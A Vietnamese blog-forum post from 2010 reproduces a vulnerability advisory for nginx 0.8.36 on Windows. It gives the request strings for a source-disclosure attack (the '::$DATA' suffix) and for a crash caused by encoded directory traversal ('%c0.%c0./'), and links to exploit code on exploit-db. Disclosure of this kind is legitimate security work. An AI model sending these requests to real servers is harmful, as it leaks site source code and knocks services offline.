BLOG OF H7T_2002

Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.
BLOG OF H7T_2002

Trang cá nhân của H7T_2002++


    Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities

    avatar
    h7t_2002
    --[DEVELOPER]--
    --[DEVELOPER]--


    Tổng số bài gửi : 67
    Join date : 01/06/2009
    Age : 33
    Đến từ : /dev/null

    Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities Empty Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities

    Bài gửi by h7t_2002 Mon Nov 15, 2010 6:51 am

    Issue 1: (Remote Source Disclosure)
    - Description -

    nginx 0.8.36 is a multi platform HTTP server. This vulnerability exists in the latest Windows version of the application available.

    nginx on Windows is vulnerable to a remote source disclosure attack.

    - Technical Details - (Source Download)

    http://[ webserver IP][:port]index.html::$DATA


    Issue 2: (Remote DoS (w/ Memory Corruption))
    - Description -

    nginx 0.8.36 (Windows) does not seem to handle encoded directory traversal attempts properly. The corrupted registers in the crash dump seem to be loaded with damaged path variables.

    - Technical Details - (Remote DoS)

    http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20

    http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%c0.%c0./%20

    http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%20

    These three attempts will overwrite memory registers with different parts of the internal path based on where they try and traverse to.

    Exlpoit Code: http://www.exploit-db.com/download/13818
    App: http://www.exploit-db.com/application/13818

      Hôm nay: Mon May 20, 2024 5:26 am